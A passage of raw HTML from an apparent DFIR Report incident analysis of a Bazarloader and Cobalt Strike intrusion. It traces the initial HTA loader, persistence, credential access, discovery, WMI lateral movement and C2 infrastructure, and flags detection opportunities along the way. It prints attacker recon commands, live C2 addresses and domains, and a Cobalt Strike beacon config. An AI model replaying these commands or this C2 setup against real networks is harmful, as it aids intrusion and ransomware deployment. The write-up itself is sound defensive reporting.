src="https://thedfirreport.com/wp-content/uploads/2021/11/b7eb0f03b4298506d506b3212d1bcc69972e2706249a5b9e535f6ea28d43a323" alt="enter image description here" 
width="949" height="61" /></a></p> <p>Followed by the execution of the HTA:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/2de12905c5c982b4ae7876ef23c5594051efc03fb0bf0daaad84f480f773830c-1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4755" src="https://thedfirreport.com/wp-content/uploads/2021/11/2de12905c5c982b4ae7876ef23c5594051efc03fb0bf0daaad84f480f773830c-1.png" alt="" width="310" height="35" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/2de12905c5c982b4ae7876ef23c5594051efc03fb0bf0daaad84f480f773830c-1.png 310w, https://thedfirreport.com/wp-content/uploads/2021/11/2de12905c5c982b4ae7876ef23c5594051efc03fb0bf0daaad84f480f773830c-1-300x34.png 300w" sizes="auto, (max-width: 310px) 100vw, 310px" /></a></p> <p>Analysis of the HTA file shows a mix of encoded HTML and JavaScript/VBScript code, not to mention profanity at the start of the file.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/9c60564c3c931ab0997a0b1d1576ca09d0ddec29b331655cbcf13c77fb8a5f5a"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/9c60564c3c931ab0997a0b1d1576ca09d0ddec29b331655cbcf13c77fb8a5f5a" alt="enter image description here" width="969" height="498" /></a></p> <p>The base64 encoded string can be decoded to:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/9f647bdcc95ed17b46e7e166bd80c79c85701cc53d2c98873bec3a897ce304f6"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/9f647bdcc95ed17b46e7e166bd80c79c85701cc53d2c98873bec3a897ce304f6" alt="enter image description here" width="1723" height="455" /></a></p> <p>The code downloads a binary file (compareForfor.jpg) masquerading as a JPG (Image file) from millscruelg[.]com to the following folder “c:\users\public”, and incorporating VBScript code, 
utilizes REGSVR32 to execute this DLL.</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/beaa83c86c77ad8f3fe2ad4baa905b35933b1294af9f5631e80e60aafef312b3"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/beaa83c86c77ad8f3fe2ad4baa905b35933b1294af9f5631e80e60aafef312b3" alt="enter image description here" width="586" height="40" /></a></p> <hr /> <p>This initiates a connection to 64.227.65[.]60:443 and invokes a Svchost.exe, followed by a lookup to myexternalip[.]com to retrieve the external public-facing IPv4 address of the network. The attacker could use this information to verify the network being targeted and/or to facilitate tool configuration. Two DLLs were loaded via RunDll32 using the Svchost process. The first was D574.dll:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/2de12905c5c982b4ae7876ef23c5594051efc03fb0bf0daaad84f480f773830c"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/2de12905c5c982b4ae7876ef23c5594051efc03fb0bf0daaad84f480f773830c" alt="enter image description here" width="429" height="40" /></a></p> <hr /> <p>Followed by D8B3.dll:</p> <p><img decoding="async" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/6c007b9f755b01e99fdb11ba0983477311fd7ae7c133edc50d351d2d6fb44bf5" alt="enter image description here" /></p> <p>D8B3.dll injected into the Winlogon process (high integrity):</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/157ab4613bc64d45aad39a06f7c9e1bbdac31afe3e1da5845f4e4dee593e2c11"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/157ab4613bc64d45aad39a06f7c9e1bbdac31afe3e1da5845f4e4dee593e2c11" alt="enter image description here" width="1235" 
height="29" /></a></p> <p>In the case of D8B3.dll, the DLL was Go compiled. Both DLLs carried invalid code-signing certificates, so they could be detected by checking for a failed or revoked signature status; note that the converse does not hold — a valid signature alone is not a sufficient basis to trust a binary:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/44cd52c302739e02de041a7db50bc820f0d9b8bc8c948432f55a151e8935e618"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/44cd52c302739e02de041a7db50bc820f0d9b8bc8c948432f55a151e8935e618" alt="enter image description here" width="195" height="63" /></a></p> <p>Additionally, neither DLL had any populated file version metadata:</p> <p><img decoding="async" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/bc100cd9ef535089bdde054eeb00d24a45ba85231e588f23ddf3c0b2e5176f08" alt="enter image description here" /></p> <p>The process hierarchy tree is visualized below:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/927a09d2bb51e93a6abf163e97fbedc1cf09f76f333ec1a7e5a936345fffc8a5"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/927a09d2bb51e93a6abf163e97fbedc1cf09f76f333ec1a7e5a936345fffc8a5" alt="enter image description here" width="508" height="500" /></a></p> <p>This is very similar to the Bazarloader <a href="https://isc.sans.edu/diary/rss/27738" target="_blank" rel="noopener">analysis by Brad Duncan</a> on 11/08/2021.</p> <h3 id="persistence">Persistence</h3> <p>We observed the AnyDesk application created under the folder ‘c:\users\&lt;REDACTED&gt;\Videos’, an unusual and suspicious location for executable activity – portable executables appearing in non-standard file system locations such as this are a good detection opportunity.</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/7f72bf852b58de31e886393160e0dc14665c86c9863f90ac3b69bccc801d18cb"><img loading="lazy" 
decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/7f72bf852b58de31e886393160e0dc14665c86c9863f90ac3b69bccc801d18cb" alt="enter image description here" width="383" height="24" /></a></p> <hr /> <p><a href="https://anydesk.com/" target="_blank" rel="noopener">AnyDesk</a> is a closed source remote desktop application that is available for several operating systems. It is free for private use. We observed a long connection initiated from the AnyDesk application towards legitimately registered IPv4 ranges. However, we did not observe many events of interest during these sessions.</p> <h3 id="credential-access">Credential Access</h3> <p>ProcessHacker was also dropped in the root of C:\ and likely used to access the LSASS process. The use of utilities such as ProcessHacker would be unusual for typical users, and applications from a C:\ root would also be suspicious in certain environments.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/ae2d915c25b3741d2639c30c2c10417bf81fcadfdc2c417ba004a8ae6bc64b6e"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/ae2d915c25b3741d2639c30c2c10417bf81fcadfdc2c417ba004a8ae6bc64b6e" alt="enter image description here" width="411" height="98" /></a></p> <h3 id="discovery">Discovery</h3> <p>Using the RunDLL32 and Winlogon process, we observed many typical host and network discovery commands utilizing living off the land techniques such as net, nltest, tasklist and time. 
Examples included:</p> <pre><code><span class="hljs-keyword">tasklist</span> /s &lt;REDACTED&gt;
<span class="hljs-keyword">net</span> group <span class="hljs-string">"domain admins"</span> /dom
<span class="hljs-keyword">net</span> localgroup <span class="hljs-string">"administrator"</span>
<span class="hljs-keyword">nltest</span> /domain_trusts /all_trusts
<span class="hljs-keyword">net</span> view /<span class="hljs-literal">all</span> /domain
<span class="hljs-keyword">net</span> view /<span class="hljs-literal">all</span>
time
<span class="hljs-keyword">ping</span></code></pre> <p>While running some of these commands, copy-and-paste errors were present, indicating the operator was likely working from a runbook such as the leaked Conti manual from August: <code>tasklist /s ip</code> was executed with the literal placeholder <code>ip</code> from the playbook rather than an actual host IP address, and the corrected command was observed right after this mistake.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/5794-7.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4773" src="https://thedfirreport.com/wp-content/uploads/2021/11/5794-7.png" alt="" width="683" height="187" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/5794-7.png 683w, https://thedfirreport.com/wp-content/uploads/2021/11/5794-7-300x82.png 300w" sizes="auto, (max-width: 683px) 100vw, 683px" /></a></p> <p>The Cmd.exe process invoked many of the commands with unusual parent processes such as RunDLL32.exe. 
The example below using the time command:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/b9c5ab4ca577c810f6fe15373ae4a2bcc3a79e790a788e0aaa44945ba1c5d6f1"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/b9c5ab4ca577c810f6fe15373ae4a2bcc3a79e790a788e0aaa44945ba1c5d6f1" alt="enter image description here" width="515" height="242" /></a></p> <hr /> <p>Red Canary provides a good detection guide for RunDLL32; <a href="https://redcanary.com/threat-detection-report/techniques/rundll32/" target="_blank" rel="noopener">this</a> covers unusual RunDLL32 activity such as command less, unusual spawned activity, etc.</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/4cf94e23abd22fa0ad6e718ca833baa0e0b530494c3309acc5d001bda83bdbaa"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/4cf94e23abd22fa0ad6e718ca833baa0e0b530494c3309acc5d001bda83bdbaa" alt="enter image description here" width="551" height="220" /></a></p> <hr /> <p>Discovery command invocation:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/0279e95c4c33e2b33b3509e07e19811588d32c0488908f01d7c006cd0d963e03"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/0279e95c4c33e2b33b3509e07e19811588d32c0488908f01d7c006cd0d963e03" alt="enter image description here" width="937" height="436" /></a></p> <p><a href="https://thedfirreport.com/2020/05/08/adfind-recon/" target="_blank" rel="noopener">AdFind</a> was observed via a file write for the binary, but there was no evidence of execution.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/e2869d1ae419f425ffa968640aab1a4db4e893e835136118f2a868727d5b2ee5"><img loading="lazy" decoding="async" class="alignnone" 
title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/e2869d1ae419f425ffa968640aab1a4db4e893e835136118f2a868727d5b2ee5" alt="enter image description here" width="331" height="42" /></a></p> <p>File share enumeration was achieved using the PowerShell <a href="https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/functions/Invoke-ShareFinder.ps1" target="_blank" rel="noopener">Invoke-ShareFinder</a> script, part of PowerView.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/5e2b9072978174209ec9599d77e24814eb667a9a475a04d303a32627a73ad5b3"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/5e2b9072978174209ec9599d77e24814eb667a9a475a04d303a32627a73ad5b3" alt="enter image description here" width="766" height="209" /></a></p> <p>The output file was created at c:\ProgramData\found_shares.txt. The use of this tool has been observed in other <a href="https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/" target="_blank" rel="noopener">recent intrusions</a>. 
PowerShell was invoked by the Winlogon process (into which the D8B3.dll beacon had been injected), and the resulting output file was created by Rundll32.exe.</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/93ddd3e8229d05f00c11963ef5f11182f696d3d2907be284d0cbba1d30d62b5d"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/93ddd3e8229d05f00c11963ef5f11182f696d3d2907be284d0cbba1d30d62b5d" alt="enter image description here" width="338" height="44" /></a></p> <hr /> </div> <p>On the second day of the intrusion, the threat actors accessed the backup server over RDP through the Cobalt Strike beacon and opened the backup console on that server. Interactive review of backup infrastructure is worth treating as a high-priority alert in its own right; in this case it preceded the ransomware deployment that followed on day five.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/5794-8.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4778" src="https://thedfirreport.com/wp-content/uploads/2021/11/5794-8.png" alt="" width="660" height="417" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/5794-8.png 660w, https://thedfirreport.com/wp-content/uploads/2021/11/5794-8-300x190.png 300w" sizes="auto, (max-width: 660px) 100vw, 660px" /></a></p> <p>After reviewing the backups, they also opened Task Manager via the GUI (<a href="https://www.hexacorn.com/blog/2018/07/22/taskmgr-exe-slashing-numbers/" target="_blank" rel="noopener">indicated by the /4 in the process command line</a>) to review the running processes on the system.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/5794-9.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4779" src="https://thedfirreport.com/wp-content/uploads/2021/11/5794-9.png" alt="" width="464" height="417" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/5794-9.png 464w, https://thedfirreport.com/wp-content/uploads/2021/11/5794-9-300x270.png 300w" sizes="auto, (max-width: 464px) 100vw, 464px" /></a></p> <div class="markdown"> <h3 id="lateral-movement">Lateral 
Movement</h3> <p>A Cobalt Strike beacon was executed on a critical asset (the backup host in this intrusion) within the network using the following command:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/360da830c3f3842301f7b01e444953cbfc7c457d21206b1b712c8dda08094c72"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/360da830c3f3842301f7b01e444953cbfc7c457d21206b1b712c8dda08094c72" alt="enter image description here" width="1023" height="222" /></a></p> <hr /> <p>Remote process execution was achieved using WMI (WMIC remote process creation) to invoke Rundll32, which loaded 143.dll (a Cobalt Strike beacon) on the target host. On the target, this pattern typically surfaces as Rundll32.exe being spawned by WmiPrvSE.exe, which is a reliable lateral-movement detection opportunity:</p> <p><img decoding="async" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/8a72c5822404bebc0e8c7c6f9673fa4a78a680c8dedc4adf443f0313d2cc35c6" alt="enter image description here" /></p> <p>The Cobalt Strike beacon (143.dll) then injected into the svchost process ‘svchost.exe -k UnistackSvcGroup -s CDPUserSvc’:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/a38f6e90769a77efb1025677dae290858a96d298e805dec77d49d4b3660fdddf.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4757" src="https://thedfirreport.com/wp-content/uploads/2021/11/a38f6e90769a77efb1025677dae290858a96d298e805dec77d49d4b3660fdddf.png" alt="" width="409" height="140" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/a38f6e90769a77efb1025677dae290858a96d298e805dec77d49d4b3660fdddf.png 409w, https://thedfirreport.com/wp-content/uploads/2021/11/a38f6e90769a77efb1025677dae290858a96d298e805dec77d49d4b3660fdddf-300x103.png 300w" sizes="auto, (max-width: 409px) 100vw, 409px" /></a></p> <hr /> <p>This was followed by a request to checkauj[.]com (82.117.252[.]143). Approximately 9 hours later, the attacker established an RDP session via the 143.dll beacon. 
This was achieved very early in the intrusion, and we were able to correlate the activity:</p> <hr /> <p><img decoding="async" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/b2ae321614fb060e6f17a7b95a08bec9ccff1b1fb884d0e327c8bacef1403b2f" alt="enter image description here" /></p> <hr /> <p>During this event, we believe that the attacker disclosed the remote workstation name ‘win-344vu98d3ru’.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/2d929ab92d2873804c44b155f95bc9470fa15dedb84788f9a84d94b86d62e8c3.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4772" src="https://thedfirreport.com/wp-content/uploads/2021/11/2d929ab92d2873804c44b155f95bc9470fa15dedb84788f9a84d94b86d62e8c3.png" alt="" width="526" height="695" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/2d929ab92d2873804c44b155f95bc9470fa15dedb84788f9a84d94b86d62e8c3.png 526w, https://thedfirreport.com/wp-content/uploads/2021/11/2d929ab92d2873804c44b155f95bc9470fa15dedb84788f9a84d94b86d62e8c3-227x300.png 227w" sizes="auto, (max-width: 526px) 100vw, 526px" /></a></p> <h3 id="command-and-control">Command and Control</h3> <p>The Bazar DLL masquerading as a jpg made use of HTTPS C2 throughout the full length of the intrusion.</p> <h4 id="bazar-c2">Bazar C2</h4> <p>64.227.65.60:443</p> <pre><code><span class="hljs-tag">JA3</span><span class="hljs-pseudo">:72a589da586844d7f0818ce684948eea</span> <span class="hljs-tag">JA3s</span><span class="hljs-pseudo">:ec74a5c51106f0419184d0dd08fb05bc</span></code></pre> <pre><code>Certificate: [<span class="hljs-number">7f</span>:d6:df:<span class="hljs-number">4</span>d:<span class="hljs-number">5</span>e:c4:d9:<span class="hljs-number">71</span>:c0:<span class="hljs-number">46</span>:<span class="hljs-number">8</span>d:<span class="hljs-number">47</span>:e5:<span class="hljs-number">81</span>:<span class="hljs-number">75</span>:<span 
class="hljs-number">57</span>:d6:<span class="hljs-number">92</span>:<span class="hljs-number">72</span>:<span class="hljs-number">96</span> ] Not Before: <span class="hljs-number">2021</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">28</span> UTC Not After: <span class="hljs-number">2022</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">28</span> UTC Issuer Org: GG EST Subject Common: perdefue.fr Subject Org: GG EST Public Algorithm: rsaEncryption </code></pre> <p>161.35.147.110:443</p> <pre><code><span class="hljs-tag">JA3</span><span class="hljs-pseudo">:72a589da586844d7f0818ce684948eea</span> <span class="hljs-tag">JA3s</span><span class="hljs-pseudo">:ec74a5c51106f0419184d0dd08fb05bc</span></code></pre> <pre><code>Certificate: [<span class="hljs-number">21</span>:ff:<span class="hljs-number">9f</span>:e0:<span class="hljs-number">8</span>a:dd:c3:ed:<span class="hljs-number">36</span>:<span class="hljs-number">90</span>:a0:e1:<span class="hljs-number">11</span>:<span class="hljs-number">70</span>:fe:c4:b3:<span class="hljs-number">42</span>:f5:<span class="hljs-number">1</span>a ] Not Before: <span class="hljs-number">2021</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">30</span> UTC Not After: <span class="hljs-number">2022</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">30</span> UTC Issuer Org: GG EST Subject Common: perdefue.fr Subject Org: GG EST Public Algorithm: rsaEncryption </code></pre> <p>161.35.155.92:443</p> <pre><code><span 
class="hljs-tag">JA3</span><span class="hljs-pseudo">:72a589da586844d7f0818ce684948eea</span> <span class="hljs-tag">JA3s</span><span class="hljs-pseudo">:ec74a5c51106f0419184d0dd08fb05bc</span></code></pre> <pre><code>Certificate: [<span class="hljs-number">42</span>:<span class="hljs-number">7</span>d:a4:<span class="hljs-number">48</span>:<span class="hljs-number">5</span>b:<span class="hljs-number">6</span>b:<span class="hljs-number">2</span>b:<span class="hljs-number">92</span>:<span class="hljs-number">2</span>c:<span class="hljs-number">07</span>:<span class="hljs-number">9</span>d:cc:<span class="hljs-number">59</span>:<span class="hljs-number">14</span>:<span class="hljs-number">2</span>e:de:b1:e8:f5:bb ] Not Before: <span class="hljs-number">2021</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">30</span> UTC Not After: <span class="hljs-number">2022</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">30</span> UTC Issuer Org: GG EST Subject Common: perdefue.fr Subject Org: GG EST Public Algorithm: rsaEncryption </code></pre> <p>64.227.69.92:443</p> <pre><code><span class="hljs-tag">JA3</span><span class="hljs-pseudo">:72a589da586844d7f0818ce684948eea</span> <span class="hljs-tag">JA3s</span><span class="hljs-pseudo">:ec74a5c51106f0419184d0dd08fb05bc</span></code></pre> <pre><code>Certificate: [<span class="hljs-number">97</span>:<span class="hljs-number">33</span>:eb:<span class="hljs-number">80</span>:<span class="hljs-number">85</span>:ae:f0:<span class="hljs-number">0</span>e:<span class="hljs-number">40</span>:<span class="hljs-number">94</span>:ac:d5:<span class="hljs-number">38</span>:<span class="hljs-number">96</span>:<span class="hljs-number">6</span>a:e5:<span class="hljs-number">75</span>:<span 
class="hljs-number">2</span>b:<span class="hljs-number">49</span>:<span class="hljs-number">8</span>c ] Not Before: <span class="hljs-number">2021</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">28</span> UTC Not After: <span class="hljs-number">2022</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">28</span> UTC Issuer Org: GG EST Subject Common: perdefue.fr Subject Org: GG EST Public Algorithm: rsaEncryption </code></pre> <h4 id="cobalt-strike">Cobalt Strike</h4> <p>The first DLL [D574.dll] didn’t produce any immediate follow-on activity, whereas D8B3.dll was loaded by RunDll32 and was associated with many activities, from file creation and process execution to persistent network connectivity to 82.117.252[.]143:443 throughout the intrusion.</p> <p>D574.dll was loaded by the RunDll32 process, with persistent DNS query activity to volga.azureedge[.]net but no established network connectivity.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/a6abc9f9fa1754b78f352dba2d215682604beb1cb1dade806822f3b500194cb6"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/a6abc9f9fa1754b78f352dba2d215682604beb1cb1dade806822f3b500194cb6" alt="enter image description here" width="973" height="114" /></a></p> <p>We observed that the DLL payload “D574.dll” had issues contacting the domain volga.azureedge[.]net and its C2 server, as shown by <a href="https://blog.didierstevens.com/2021/07/16/sysmons-dns-querystatus-field/" target="_blank" rel="nofollow noopener">DNS 9003 response codes</a>.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/2ed4b6f441190247999fd96b464d551eaae088873bc9c8bbe2ad753b20304711"><img loading="lazy" 
decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/2ed4b6f441190247999fd96b464d551eaae088873bc9c8bbe2ad753b20304711" alt="enter image description here" width="418" height="178" /></a></p> <p>External sandboxes show the domain tied to other Cobalt Strike beacon samples not associated with this report; it is likely the server had been taken down by this time.</p> <p><a href="https://tria.ge/210803-w15fxk72ns" target="_blank" rel="nofollow noopener">https://tria.ge/210803-w15fxk72ns</a></p> <p><a href="https://capesandbox.com/analysis/175977/" target="_blank" rel="nofollow noopener">https://capesandbox.com/analysis/175977/</a></p> <p>D8B3.dll shows initial activity, followed by established network connectivity to 82.117.252[.]143:80.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/e9d99ea9abdb897fa3d346534f32338e3a5433eeb1e3c2675b208f1e1494b0ed"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/e9d99ea9abdb897fa3d346534f32338e3a5433eeb1e3c2675b208f1e1494b0ed" alt="enter image description here" width="963" height="109" /></a></p> <p>D8B3.dll was the Cobalt Strike beacon the attackers used throughout the intrusion. It was the main payload used to facilitate the bulk of the initial intrusion and the ongoing activity to maintain access. The DLL 143.dll, used in lateral movement from the beachhead host to the backup server, also communicated with this Cobalt Strike server. 
Once the attackers gained a foothold and pivoted laterally, they were able to switch to using RDP and access specific hosts of interest.</p> <p>five.azureedge.net 82.117.252.143:80</p> <p>checkauj.com 82.117.252.143:443</p> <pre><code><span class="hljs-attribute">JA3</span>: <span class="hljs-string">a0e9f5d64349fb13191bc781f81f42e1</span> <span class="hljs-attribute">JA3s</span>: <span class="hljs-string">ae4edc6faf64d08308082ad26be60767</span></code></pre> <pre><code><span class="hljs-constant">Certificate</span><span class="hljs-symbol">:</span> [<span class="hljs-number">68</span><span class="hljs-symbol">:c5</span><span class="hljs-symbol">:fc</span><span class="hljs-symbol">:c0</span><span class="hljs-symbol">:</span><span class="hljs-number">4</span><span class="hljs-symbol">a:</span><span class="hljs-number">34</span><span class="hljs-symbol">:e4</span><span class="hljs-symbol">:</span><span class="hljs-number">8</span><span class="hljs-symbol">f:</span><span class="hljs-number">01</span><span class="hljs-symbol">:</span><span class="hljs-number">86</span><span class="hljs-symbol">:</span><span class="hljs-number">59</span><span class="hljs-symbol">:c1</span><span class="hljs-symbol">:da</span><span class="hljs-symbol">:</span><span class="hljs-number">40</span><span class="hljs-symbol">:</span><span class="hljs-number">78</span><span class="hljs-symbol">:</span><span class="hljs-number">00</span><span class="hljs-symbol">:</span><span class="hljs-number">00</span><span class="hljs-symbol">:</span><span class="hljs-number">20</span><span class="hljs-symbol">:a0</span><span class="hljs-symbol">:b0</span> ] <span class="hljs-constant">Not</span> <span class="hljs-constant">Before</span><span class="hljs-symbol">:</span> <span class="hljs-number">2021</span>/08/<span class="hljs-number">03</span> <span class="hljs-number">11</span><span class="hljs-symbol">:</span><span class="hljs-number">50</span><span class="hljs-symbol">:</span><span 
class="hljs-number">47</span> <span class="hljs-constant">UTC</span> <span class="hljs-constant">Not</span> <span class="hljs-constant">After</span><span class="hljs-symbol">:</span> <span class="hljs-number">2021</span>/<span class="hljs-number">11</span>/<span class="hljs-number">01</span> <span class="hljs-number">11</span><span class="hljs-symbol">:</span><span class="hljs-number">50</span><span class="hljs-symbol">:</span><span class="hljs-number">45</span> <span class="hljs-constant">UTC</span> <span class="hljs-constant">Issuer</span> <span class="hljs-constant">Org</span><span class="hljs-symbol">:</span> <span class="hljs-constant">Let</span><span class="hljs-string">'s Encrypt Subject Common: checkauj.com [checkauj.com ,www.checkauj.com ] Public Algorithm: rsaEncryption</span></code></pre> <h4 id="cobalt-strike-config">Cobalt Strike Config</h4> <p>82.117.252.143 – checkauj.com</p> <pre><code>{ "<span class="hljs-attribute">BeaconType</span>": <span class="hljs-value">[ <span class="hljs-string">"HTTP"</span> ]</span>, "<span class="hljs-attribute">Port</span>": <span class="hljs-value"><span class="hljs-number">80</span></span>, "<span class="hljs-attribute">SleepTime</span>": <span class="hljs-value"><span class="hljs-number">60000</span></span>, "<span class="hljs-attribute">MaxGetSize</span>": <span class="hljs-value"><span class="hljs-number">1403644</span></span>, "<span class="hljs-attribute">Jitter</span>": <span class="hljs-value"><span class="hljs-number">37</span></span>, "<span class="hljs-attribute">C2Server</span>": <span class="hljs-value"><span class="hljs-string">"checkauj.com,/jquery-3.3.1.min.js"</span></span>, "<span class="hljs-attribute">HttpPostUri</span>": <span class="hljs-value"><span class="hljs-string">"/jquery-3.3.2.min.js"</span></span>, "<span class="hljs-attribute">Malleable_C2_Instructions</span>": <span class="hljs-value">[ <span class="hljs-string">"Remove 1522 bytes from the end"</span>, <span class="hljs-string">"Remove 
84 bytes from the beginning"</span>, <span class="hljs-string">"Remove 3931 bytes from the beginning"</span>, <span class="hljs-string">"Base64 URL-safe decode"</span>, <span class="hljs-string">"XOR mask w/ random key"</span> ]</span>, "<span class="hljs-attribute">SpawnTo</span>": <span class="hljs-value"><span class="hljs-string">"AAAAAAAAAAAAAAAAAAAAAA=="</span></span>, "<span class="hljs-attribute">HttpGet_Verb</span>": <span class="hljs-value"><span class="hljs-string">"GET"</span></span>, "<span class="hljs-attribute">HttpPost_Verb</span>": <span class="hljs-value"><span class="hljs-string">"POST"</span></span>, "<span class="hljs-attribute">HttpPostChunk</span>": <span class="hljs-value"><span class="hljs-number">0</span></span>, "<span class="hljs-attribute">Spawnto_x86</span>": <span class="hljs-value"><span class="hljs-string">"%windir%\\syswow64\\rundll32.exe"</span></span>, "<span class="hljs-attribute">Spawnto_x64</span>": <span class="hljs-value"><span class="hljs-string">"%windir%\\sysnative\\rundll32.exe"</span></span>, "<span class="hljs-attribute">CryptoScheme</span>": <span class="hljs-value"><span class="hljs-number">0</span></span>, "<span class="hljs-attribute">Proxy_Behavior</span>": <span class="hljs-value"><span class="hljs-string">"Use IE settings"</span></span>, "<span class="hljs-attribute">Watermark</span>": <span class="hljs-value"><span class="hljs-number">0</span></span>, "<span class="hljs-attribute">bStageCleanup</span>": <span class="hljs-value"><span class="hljs-string">"True"</span></span>, "<span class="hljs-attribute">bCFGCaution</span>": <span class="hljs-value"><span class="hljs-string">"False"</span></span>, "<span class="hljs-attribute">KillDate</span>": <span class="hljs-value"><span class="hljs-number">0</span></span>, "<span class="hljs-attribute">bProcInject_StartRWX</span>": <span class="hljs-value"><span class="hljs-string">"True"</span></span>, "<span class="hljs-attribute">bProcInject_UseRWX</span>": <span 
class="hljs-value"><span class="hljs-string">"False"</span></span>, "<span class="hljs-attribute">bProcInject_MinAllocSize</span>": <span class="hljs-value"><span class="hljs-number">17500</span></span>, "<span class="hljs-attribute">ProcInject_PrependAppend_x86</span>": <span class="hljs-value">[ <span class="hljs-string">"kJA="</span>, <span class="hljs-string">"Empty"</span> ]</span>, "<span class="hljs-attribute">ProcInject_PrependAppend_x64</span>": <span class="hljs-value">[ <span class="hljs-string">"kJA="</span>, <span class="hljs-string">"Empty"</span> ]</span>, "<span class="hljs-attribute">ProcInject_Execute</span>": <span class="hljs-value">[ <span class="hljs-string">"CreateThread"</span>, <span class="hljs-string">"SetThreadContext"</span>, <span class="hljs-string">"CreateRemoteThread"</span>, <span class="hljs-string">"RtlCreateUserThread"</span> ]</span>, "<span class="hljs-attribute">ProcInject_AllocationMethod</span>": <span class="hljs-value"><span class="hljs-string">"VirtualAllocEx"</span></span>, "<span 